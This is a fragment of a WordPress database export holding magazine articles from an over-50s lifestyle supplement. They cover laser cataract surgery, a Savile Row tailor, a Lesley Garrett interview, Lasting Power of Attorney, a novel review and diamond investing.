II</p>&#13;\n<p>Distributed in <em>The Sunday Telegraph</em>, June 3rd</p>&#13;\n<p> </p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120602153814-81d2007dd1ae497bae1b84236a33fe0e&amp;docName=royalwarrantspdf&amp;username=Lyonsdown&amp;loadingInfoText=Royal%20Warrants&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120602153814-81d2007dd1ae497bae1b84236a33fe0e&amp;docName=royalwarrantspdf&amp;username=Lyonsdown&amp;loadingInfoText=Royal%20Warrants&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Flight%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n<p> </p>&#13;\n<p><a href=\"http://www.ewartshaw.co.uk/financepublications/2012/RoyalWarrantspdf.pdf\" target=\"_blank\">Download PDF</a></p>&#13;\n									</div>','Royal Warrants','Diamond Jubilee, Elizabeth II','publish','open','open','','royal-warrants-2','','','2018-04-02 20:05:42','2018-04-02 20:05:42','',0,'http://westonspirit.org.uk/royal-warrants-2.asp',0,'post','',0),(197,1,'2018-02-21 12:17:08','2018-02-21 12:17:08','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/06/see-it-to-believe-it-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/06/see-it-to-believe-it-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/06/see-it-to-believe-it-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/06/see-it-to-believe-it-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/06/see-it-to-believe-it-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Cataracts affect 60 per cent of over-60s. But a pioneering surgery offers a safer, more effective alternative to cataract removal</h4>&#13;\n<p>Jonathan Hatley has struggled with poor eyesight since the onset of cataracts – but a revolutionary approach to eye surgery changed everything.</p>&#13;\n<p>Hatley is a fit and active 70 year-old. He is a keen skier and golfer, yet was suddenly having to contemplate a life without either because of deteriorating eyesight. Even driving was becoming difficult, and he feared his days behind the wheel were numbered.</p>&#13;\n<p></p><div id=\"attachment_2278\" class=\"wp-caption alignright\" style=\"width: 236px\"><img class=\"wp-image-2278   \" title=\"Couple Enjoying A Game Of Golf\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/London-eye-pic.jpg\" alt=\"\" width=\"226\" height=\"150\" /><p class=\"wp-caption-text\">After surgery: patients continue to enjoy hobbies</p></div>&#13;\n<p>Hatley visited Bobby Qureshi at Harley Street’s London Eye Hospital, the UK’s leading private eye hospital. Qureshi suggested a new cataract removal laser treatment – he is the first surgeon to perform this procedure in the UK and is the most experienced laser cataract surgeon in the country. The Femtosecond cataract laser machine, with the help of a sophisticated surgeon-guided computer, uses a laser to dissolve a cataract, using perfect precision, within seconds.</p>&#13;\n<p>This new cataract technology has a much faster healing and recovery time compared with conventional surgery, and is statistically much safer for the 60 per cent of over 60s that suffer from cataracts. “This is the greatest breakthrough in cataract surgery in nearly 30 years,” says Qureshi. “For years, many people have accepted cataracts as an unavoidable part of getting older, but that no longer needs to be the case. With this new surgery, we offer a quick, safe and effective alternative for cataract removal.”</p>&#13;\n<p>“It was honestly a miracle,” says Hatley. “Although I had become accustomed to living with poor eyesight, I suppose I didn’t realise how much worse my vision had become. The difference took my breath away. The treatment that I received at the London Eye Hospital was top-notch from start to finish,” he said.</p>&#13;\n<p>“Before going to see Mr Qureshi, my vision was so bad that I was considering giving up driving altogether, but now I don’t need to. Instead, I’m already planning a ski trip and expect to play a lot more golf. The whole experience has been completely life-changing.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<h5> 0207 060 2602</h5>&#13;\n<h5><em><a href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></em><div class=\"woo-sc-hr\"></div></h5>&#13;\n<p> </p>&#13;\n									</div>','See it to believe it','Cataracts affect 60 per cent of over-60s. But a pioneering surgery offers a safer, more effective alternative to cataract removal','publish','open','open','','see-it-to-believe-it-2','','','2018-04-02 20:05:40','2018-04-02 20:05:40','',0,'http://westonspirit.org.uk/see-it-to-believe-it-2.asp',0,'post','',0),(198,1,'2017-02-14 15:30:16','2017-02-14 15:30:16','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Tailored by tradition\" st_url=\"http://westonspirit.org.uk/2012/06/tailored-by-tradition/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Tailored by tradition\" st_url=\"http://westonspirit.org.uk/2012/06/tailored-by-tradition/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Tailored by tradition\" st_url=\"http://westonspirit.org.uk/2012/06/tailored-by-tradition/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Tailored by tradition\" st_url=\"http://westonspirit.org.uk/2012/06/tailored-by-tradition/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Tailored by tradition\" st_url=\"http://westonspirit.org.uk/2012/06/tailored-by-tradition/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>World famous tailor has hand-crafted bespoke suits for royalty, politicians and businessmen for more than 200 years</h4>&#13;\n<p><img class=\"alignright  wp-image-2323\" title=\"Henry Poole\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/Henry-Poole.jpg\" alt=\"\" width=\"430\" height=\"323\" />Established in 1806, Henry Poole &amp; Co is the founder of Savile Row, the modest Mayfair street recognised worldwide with more than 200 years of bespoke tailoring tradition. It was the eponymous Poole who first opened a Savile Row entrance to his palatial tailor’s shop in 1846 where he would serve claret and cigars to friends such as the Prince of Wales (later King Edward VII), Baron Meyer de Rothschild and Prince Louis Napoleon (the future Emperor Napoleon III).</p>&#13;\n<p>Customers of Henry Poole walk in the footsteps of kings, prime ministers, presidents and gentlemen of note from the worlds of politics, property, finance and publishing. What do Benjamin Disraeli, Charles Dickens, Winston Churchill, J. Pierpont Morgan, General de Gaulle, William Randolph Hearst and Emperor Hirohito have in common other than their appearance in the historic ledgers preserved in the Henry Poole &amp; Co archive?</p>&#13;\n<p>Today, Henry Poole &amp; Co is one of few tailors on Savile Row dedicated only to the craft of hand-making bespoke suits. Each customer is measured by hand, his pattern is cut by hand and his suit is constructed by many hands with a minimum of 54-hours’ work and an average three months to perfect, all on the premises at 15 Savile Row. Though Poole’s is always pleased to welcome new customers to Savile Row, the cutters visit countries such as Japan, USA, France and Germany, to name a few, up to four times a year.</p>&#13;\n<p>In addition to City suits and formal dress such as the dinner jacket that Poole’s cut first for Prince of Wales in 1865 before his accession to the throne, Henry Poole &amp; Co is the only Savile Row tailor to have a Livery Department and has held the British monarch’s royal warrant successively since Queen Victoria first granted it in 1869. Poole also tailored the velvet court dress, designed by Henry Poole’s father James in 1837, on the accession of Queen Victoria.</p>&#13;\n<p>In April 2017 Henry Poole &amp; Co was proud to be awarded The Queen’s Award for Enterprise: an honour conferred on Her Majesty’s birthday and in the diamond jubilee year. This award is Britain’s highest accolade for business and is granted by the Queen, on the advice of the prime minister, for excellence in international trade.</p><div class=\"woo-sc-hr\"></div>&#13;\n<h5>+44 (0) 20 7734 5985</h5>&#13;\n<h5><em><a href=\"http://www.henrypoole.com/\" target=\"_blank\">www.henrypoole.com</a></em><div class=\"woo-sc-hr\"></div></h5>&#13;\n<p> </p>&#13;\n									</div>','Tailored by tradition','World famous tailor has hand-crafted bespoke suits for royalty, politicians and businessmen for more than 200 years','publish','open','open','','tailored-by-tradition','','','2018-04-02 20:05:38','2018-04-02 20:05:38','',0,'http://westonspirit.org.uk/tailored-by-tradition.asp',0,'post','',0),(199,1,'2016-05-15 22:19:16','2016-05-15 22:19:16','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"This Life, Lesley Garrett\" st_url=\"http://westonspirit.org.uk/2012/06/this-life-lesley-garrett/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"This Life, Lesley Garrett\" st_url=\"http://westonspirit.org.uk/2012/06/this-life-lesley-garrett/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"This Life, Lesley Garrett\" st_url=\"http://westonspirit.org.uk/2012/06/this-life-lesley-garrett/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"This Life, Lesley Garrett\" st_url=\"http://westonspirit.org.uk/2012/06/this-life-lesley-garrett/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"This Life, Lesley Garrett\" st_url=\"http://westonspirit.org.uk/2012/06/this-life-lesley-garrett/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>The straight-talking diva from Donny on classical girl power, Botox and why she would still strip off on stage in her sixth decade.</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2250\" title=\"Lesley_Garrett_5292\" src=\"/wp-content/uploads/2012/06/Lesley_Garrett_5292.jpg\" alt=\"\" width=\"300\" height=\"450\" /></p>&#13;\n<p>Lesley Garrett is one of those women who, when they say they are comfortable in their body, you really believe that they mean it. Chatty, cheerful and busy with a string of projects, the diva from Donny – she was born and raised in Doncaster – is a fabulously well-preserved 57.</p>&#13;\n<p>Growing older has endowed her with greater patience and “more realistic expectations”, she says. But it hasn’t dimmed her curiosity about life, nor her energy levels: she’s currently promoting her latest album revising our rich British folk music heritage and is in the middle of a diamond jubilee tour with an all-female orchestra that she dubs “classical girl power”.</p>&#13;\n<p>And it hasn’t made her retiring in any sense of the word. Having hit the headlines two decades ago for what she blithely refers to as “a moment of nudity” in Johann Strauss’s Die Fledermaus at English National Opera (ENO), the soprano says she’d happily strip on stage in her sixth decade.</p>&#13;\n<div class=\"woo-sc-quote\"><p><em>“Don’t call me a crossoverstar. </em><em>It sounds like a bra”</em></p></div>&#13;\n<p>“Well [at ENO], I was singing a song about taking your clothes off,” she points out, “and I had earned a living taking my clothes off as an artist’s model when I was a student at the Royal Academy of Music – so stripping meant nothing to me.”</p>&#13;\n<p>And she would do it again, for art’s sake.</p>&#13;\n<p>“Of course, if it was absolutely vital to the characterisation,” says Garret. “Every serious actor or actress would say yes to that, and I am serious about the work I do. If I was playing Poppea, who famously has a bath scene, I would be naked because you can’t be in a bath with clothes on!”</p>&#13;\n<p>She keeps fit by walking and cycling with her GP husband Peter at their second home near the Pyrenees, though singing itself is a prime form of exercise.</p>&#13;\n<p>“The great thing is that singing keeps you fit with the breathing techniques. It’s very athletic,” she explains.</p>&#13;\n<p>One thing she does admit to on the cosmetic front is a brief encounter with Botox a few years ago – though only to help with headaches. “It helped enormously by stopping tension in the forehead,” she explains, a remedy that’s been borne out recently by scientific research.</p>&#13;\n<p>Her upbringing in an aspirational working-class home in south Yorkshire was “unprivileged in a material sense, but so rich in other ways. We had a tin bath in front of the fire and recycling is nothing new to me because nothing was ever thrown away by my parents. We grew all our own food and had chickens, rabbits, goats and pigs. It was an idyllic childhood”.</p>&#13;\n<p>And what glued it all together was music. “My dad is a big Pavarotti-style tenor and my mother is a beautiful English lyric soprano who still sings in choirs in Scunthorpe and Doncaster.”</p>&#13;\n<p>Family aside, this musical multi-tasker’s other inspiration was the Three Tenors, who first brought opera to the masses in 1990.</p>&#13;\n<p>“We have to break down the preconceptions about it all being fat people in foreign languages screaming at each other,” says Garrett. “Art is to be shared.”</p>&#13;\n<p>And like her heroes, she has never been frightened to take risks and crack new markets. Alongside the extensive recording career (her new album, A North Country Girl, is her 14th), she has presented her own TV series and even become a West End musical star in The Sound of Music and Carousel. Just don’t call her a “crossover” star; she says it reminds her of a bra.</p>&#13;\n<p>She was also one of the first celebrity guinea-pigs on Strictly Come Dancing’s debut season in 2004, coming third with her dance partner Anton du Beke – and she’s kept up her dancing ever since with Peter.</p>&#13;\n<p>As a baby boomer who feels her generation was “born with the best luck – the Pill and free education”, she’s comfortable with her age and thinks maturity has brought many benefits.</p>&#13;\n<p>“I have a tolerance now that I’ve not always had. And although I have as much curiosity about life as I always did, it’s tempered by wisdom. I have to have a variety of projects on the go, otherwise I’m just restless. So I tended to charge through life, thinking everything was possible, but now my expectations are more realistic,” she says.</p>&#13;\n<p>As for her advice to young people starting out, she says it’s vital to “make your own luck. Busk, sing in a pub, anything, to practise and communicate to your audience”.</p>&#13;\n<p>Sounds classic Lesley Garrett. If only the average 21-year old can keep up with her powerhouse energy . . .</p><div class=\"woo-sc-hr\"></div>&#13;\n<h5>Lesley Garrett’s latest album, A North Country Lass, is out now. For concert details of her Queen’s diamond jubilee tour of the UK from 6 June , visit <em><a href=\"http://www.lesleygarrett.co.uk/\" target=\"_blank\">www.lesleygarrett.co.uk</a></em></h5>&#13;\n<p> </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','This LIfe, Lesley arrett','The straight-talking diva from Donny on classical girl power, Botox and why she would still strip off on stage in her sixth decade.','publish','open','open','','this-life-lesley-arrett','','','2018-04-02 20:05:36','2018-04-02 20:05:36','',0,'http://westonspirit.org.uk/this-life-lesley-arrett.asp',0,'post','',0),(200,1,'2015-12-08 15:29:53','2015-12-08 15:29:53','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> mstone\" title=\"Posts by Margaret Stone\" rel=\"author\"&gt;Margaret Stone</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Time to take control\" st_url=\"http://westonspirit.org.uk/2012/06/time-to-take-control/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Time to take control\" st_url=\"http://westonspirit.org.uk/2012/06/time-to-take-control/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Time to take control\" st_url=\"http://westonspirit.org.uk/2012/06/time-to-take-control/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Time to take control\" st_url=\"http://westonspirit.org.uk/2012/06/time-to-take-control/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Time to take control\" st_url=\"http://westonspirit.org.uk/2012/06/time-to-take-control/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p></p><div id=\"attachment_2316\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-2316\" title=\"margaret3\" src=\"/wp-content/uploads/2012/06/margaret3.jpg\" alt=\"\" width=\"596\" height=\"398\" /><p class=\"wp-caption-text\">Put your trust in someone to make decisions for you, before it’s too late</p></div><br /><h4>The Queen, thank goodness, has her health and, with one or two scares apart, so too has Prince Philip. But other families with elderly relatives in their 80s and 90s aren’t so fortunate.</h4>&#13;\n<p>For them, there is the anguish of seeing parents or other family members suffer badly in their old age – poor health, approaching dementia, and an overall weariness when it comes to taking decisions.</p>&#13;\n<p>That’s where a Lasting Power of Attorney (LPA) comes in. It’s the legal permission given to someone you trust implicitly who will be able to act and take decisions on your behalf. As a safeguard, you must also ask an independent third party, known as the certificate provider, to certify that you are doing this of your own free will.</p>&#13;\n<p>By all means nominate your spouse, but it would also make sense to nominate a person from a younger generation to act on your behalf as well. You can insist that they always act in concert, or you can specify that each can make individual decisions on your behalf.</p>&#13;\n<p>There are two types of LPA. The property and financial affairs LPA gives your attorney power to manage all your financial affairs, such as running your bank accounts, dealing with tax and managing your investments.</p>&#13;\n<p>With a health and welfare LPA in place, your attorney is empowered to make decisions about moving into a care home, what medical treatment you receive, including whether you would wish to be resuscitated or not.</p>&#13;\n<p>Although you can draw up an LPA for free, it must be registered with the Office of the Public Guardian at a cost of £130 per LPA (fees are waived for those on benefits and anyone whose income is under £12,000 gets a 50 per cent reduction). If you use a solicitor to handle arrangements, you will have their fees on top.</p>&#13;\n<p>In England and Wales, you can download the LPA forms, plus detailed and clear guidelines, from the Office of the Public Guardian website, then it can take up to 11 weeks to register a LPA. If you have a pre-October 1970 Enduring Power of Attorney, it is still valid but will have to be registered, too. In Scotland and Northern Ireland, the terminology and procedures are slightly different, but the principles are fundamentally the same.</p>&#13;\n<p>I am about to take my own advice – I will let you know how I get on!</p>&#13;\n<div class=\"woo-sc-box normal large rounded \">&#13;\n<h5>Getting their affairs in order</h5>&#13;\n<p>Mike and Linda Cassell, now in their mid-60s, had a meeting with their financial adviser last December to discuss their income arrangements. Almost as a throwaway line, the subject of power of attorney came up. Like most of us, Mike and Linda hadn’t given the matter of managing their affairs as they got older too much thought, but the conversation spurred them into action. By the end of March, two Lasting Powers of Attorney had been set up and registered, bringing what Mike describes as “peace of mind”. “The forms were incredibly complicated,” he says. “I don’t think anyone should attempt to do it on their own.” But, of course, solicitors’ fees add to the cost. Although Linda’s low income meant that she qualified for reduced fees, the Cassells’ overall bill for setting up two LPAs, plus their wills, came to £1,000.</p>&#13;\n<h5>Going it alone</h5>&#13;\n<p>Alison Maddocks took out two Lasting Power of Attorney on behalf of her elderly uncle four years ago. She downloaded the forms and didn’t use a solicitor. “The guidance notes were very good, and first I filled everything in by pencil and double-checked and double-checked,” she says. Even so, a mistake did creep in. Her uncle’s doctor, his certificate provider, dated his document a day after her signature requesting registration. “Fortunately, I picked this up and was able to print out a replacement page for me to sign – otherwise it would have cost another £130.” When her uncle was hospitalised recently, she was asked about his attitude to resuscitation which was “Don’t”. Fortunately, he made a recovery and she was able to rescind that answer.</p>&#13;\n</div>&#13;\n									</div>','Time to take control','The Queen, thank goodness, has her health and, with one or two scares apart, so too has Prince Philip. But other families with elderly relatives in their 80s and 90s aren’t so fortunate.','publish','open','open','','time-to-take-control','','','2018-04-02 20:05:35','2018-04-02 20:05:35','',0,'http://westonspirit.org.uk/time-to-take-control.asp',0,'post','',0),(201,1,'2015-05-25 14:16:51','2015-05-25 14:16:51','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">9 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> ojones\" title=\"Posts by Olga B. Jones\" rel=\"author\"&gt;Olga B. Jones</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bibliophile’s Corner. The Earthquake Machine by Mary Pauline Lowry\" st_url=\"http://westonspirit.org.uk/2012/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bibliophile’s Corner. The Earthquake Machine by Mary Pauline Lowry\" st_url=\"http://westonspirit.org.uk/2012/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bibliophile’s Corner. The Earthquake Machine by Mary Pauline Lowry\" st_url=\"http://westonspirit.org.uk/2012/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bibliophile’s Corner. The Earthquake Machine by Mary Pauline Lowry\" st_url=\"http://westonspirit.org.uk/2012/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bibliophile’s Corner. The Earthquake Machine by Mary Pauline Lowry\" st_url=\"http://westonspirit.org.uk/2012/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><img class=\"alignright  wp-image-2442\" title=\"the_earthquake_machine_final\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/the_earthquake_machine_final.jpg\" alt=\"\" width=\"180\" height=\"289\" />On the outside, everything looks perfect in Rhonda’s world but at home she has to deal with a manipulative father who keeps her mentally ill mother hooked on pharmaceuticals. The only reliable person in Rhonda’s life is her family’s Mexican yardman, Jesús. But when the INS deports Jesús back to his home state of Oaxaca, Rhonda is left alone with her increasingly painful family situation. Determined to find her friend Jesús, Rhonda seizes an opportunity to run away during a camping trip with friends. She swims to the Mexican side of the Rio Grande, cuts her hair and assumes the identity of a Mexican boy named Angel. She then sets off across the desert to look for Jesús.</p>&#13;\n<p>I have really mixed feelings about this book. On one hand I loved it. It is an interesting coming-of-age tale that is well-written, has sympathetic characters, and is honest and unapologetic in its portrayal of life and people. I enjoyed the author’s ability to create the two startlingly different worlds of Mexico and the United States. I appreciated Rhonda figuring things out gradually, making mistakes and only after a time realizing where and how she erred or failed to see a more logical course of action. I liked that Rhonda’s search for Jesús and her crossing the Rio Grande played both literal and metaphorical roles in the shaping of her identity. I was glad to see that the author detailed events that were significant for the story and glossed over the parts that didn’t have any important developments or where Rhonda was too single-minded in her purpose to really pay attention to her surroundings. Even the predictability of the ending didn’t spoil the experience for me and I smiled through much of the last chapter.</p>&#13;\n<p>Sounds pretty perfect, right? Not quite, and it took me a while to figure out what it was exactly that was bothering me. Finally I decided that everything being about sex at the end of the day combined with the fact that the protagonist is only 14 years old rubbed me the wrong way. May be I’m naive and had a more sheltered adolescence than I realized, maybe that’s how it is for a lot of teenagers, especially those who don’t grow up in happy families and look for the affection and warmth of a loving relationship in all the wrong places, but the lascivious comments, the boldness of advances, the graphic descriptions of encounters made me uncomfortable. Rhonda is only 14 through most of the book, turning 15 towards the end, and yet the adults around her act as if she is one of them and even her own thoughts and actions seem at times more fitting for an older young woman. Then again, none of the events rang false, none were hard to believe in the context of the novel, so my discomfort is not due to the author’s inability to convince me but rather my own conviction that some things should not happen.</p>&#13;\n<p>I would recommend this novel to any reader who enjoys books about growing up, adventure and serious soul-searching. Just bear in mind, there are adult scenes and some pretty uncomfortable subjects. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Bibliophile’s Corner. The Earthquake Machine by Mary Pauline Lowry','On the outside, everything looks perfect in Rhonda\'s world but at home she has to deal with a manipulative father who keeps her mentally ill mother hooked on','publish','open','open','','bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry','','','2018-04-02 20:05:33','2018-04-02 20:05:33','',0,'http://westonspirit.org.uk/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry.asp',0,'post','',0),(202,1,'2018-03-26 05:44:18','2018-03-26 05:44:18','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Diamond’s jewel purpose\" st_url=\"http://westonspirit.org.uk/2012/07/diamonds-jewel-purpose/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Diamond’s jewel purpose\" st_url=\"http://westonspirit.org.uk/2012/07/diamonds-jewel-purpose/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Diamond’s jewel purpose\" st_url=\"http://westonspirit.org.uk/2012/07/diamonds-jewel-purpose/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Diamond’s jewel purpose\" st_url=\"http://westonspirit.org.uk/2012/07/diamonds-jewel-purpose/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Diamond’s jewel purpose\" st_url=\"http://westonspirit.org.uk/2012/07/diamonds-jewel-purpose/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>With interest rates staying at rock bottom, could diamonds be an investor’s best friend?</h4>&#13;\n<div id=\"attachment_2736\" class=\"wp-caption alignright\" style=\"width: 154px\"><img class=\" wp-image-2736  \" title=\"diamonds - p11\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/diamonds-p11.jpg\" alt=\"\" width=\"144\" height=\"144\" /><p class=\"wp-caption-text\">Wearing your diamonds could increase their worth</p></div>&#13;\n<p>Diamonds are a limited resource. Easily stored – and beautiful – this most precious of gems is more sought after than ever before, with demand being driven by the newly-rich in China and India.</p>&#13;\n<p>Returns on five-carat diamonds rose by 165 per cent between 2002 and 2016, beating stock market investments, according to diamond-trading company Rapaport.</p>&#13;\n<p>But they can be volatile: Rapaport’s RapNet diamond index for one-carat diamonds soared 34 per cent in the first half of 2017, but plunged by 12 per cent in the second half.</p>&#13;\n<p>Unlike gold bars, diamonds are not standardised. Each is unique, so spotting a bargain, or a fake, is all but impossible for non-experts. There is also no universal pricing system. Loose stones are subject to VAT, and retailers impose high mark-ups.</p>&#13;\n<p>But if you prefer your investment to be decorative as well as potentially lucrative, diamond jewellery may be an alternative.</p>&#13;\n<p>Stephen Whittaker of jewellery auctioneer Fellows in Birmingham, says: “A beautifully-made piece of diamond jewellery means you get the diamonds but also potential appreciation because of the setting.”</p>&#13;\n<p>And, of course, wearing your diamonds brings a sparkle into your life that financial investments just don’t have. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h3>Star Quality</h3>&#13;\n<p>Elizabeth Taylor wore the 33.19-carat diamond given to her by Richard Burton almost daily. She said: “My ring gives me the strangest feeling for beauty . . . it sort of hums with its own beatific life.” It sold for $8.8m (£5.7m) in December 2016, having been bought for $300,000 in 1968.</p>&#13;\n<div id=\"attachment_2740\" class=\"wp-caption alignright\" style=\"width: 190px\"><img class=\" wp-image-2740  \" title=\"tiffany\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/tiffany.jpg\" alt=\"\" width=\"180\" height=\"167\" /><p class=\"wp-caption-text\">Tiffany yellow diamond</p></div>&#13;\n<p>The Tiffany yellow diamond (right), a cushion-shaped 128.54-carat diamond normally on show at Tiffany’s department store in New York, has just been reset into a new diamond and platinum necklace.</p>&#13;\n<p>The 105-carat Koh-i-Noor diamond, presented to Queen Victoria in 1850, is now in the platinum crown made for the Queen Mother. Traditionally worn by queens, it is said to bring bad luck to men who wear it. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Diamond’s jewel purpose','With interest rates staying at rock bottom, could diamonds be an investor’s best friend?','publish','open','open','','diamonds-jewel-purpose','','','2018-04-02 20:05:31','2018-04-02 20:05:31','',0,'http://westonspirit.org.uk/diamonds-jewel-purpose.asp',0,'post','',0),(203,1,'2014-03-09 07:12:22','2014-03-09 07:12:22','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get up and go – July\" st_url=\"http://westonspirit.org.uk/2012/07/get-up-and-go-july/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get up and go – July\" st_url=\"http://westonspirit.org.uk/2012/07/get-up-and-go-july/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get up and go – July\" st_url=\"http://westonspirit.org.uk/2012/07/get-up-and-go-july/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get up and go – July\" st_url=\"http://westonspirit.org.uk/2012/07/get-up-and-go-july/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get up and go – July\" st_url=\"http://westonspirit.org.uk/2012/07/get-up-and-go-july/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>As distributed in <em>The Sunday Telegraph</em> July 15th</p>&#13;\n<p>In the July edition of <em><a href=\"/\" target=\"_blank\">Get Up and Go</a></em>, we explore top golf courses, scope out the best gear and get some playing tips from coaches to the stars. Elsewhere, writer Michael Bywater enjoys the spa life at Champneys and Hunter Davies limbers up for the Olympics – provided he can get off the couch.</p>&#13;\n<p>Those are just couple of the highlights in the latest issue of <em>Get Up and Go </em>- Fitness special. </p><div 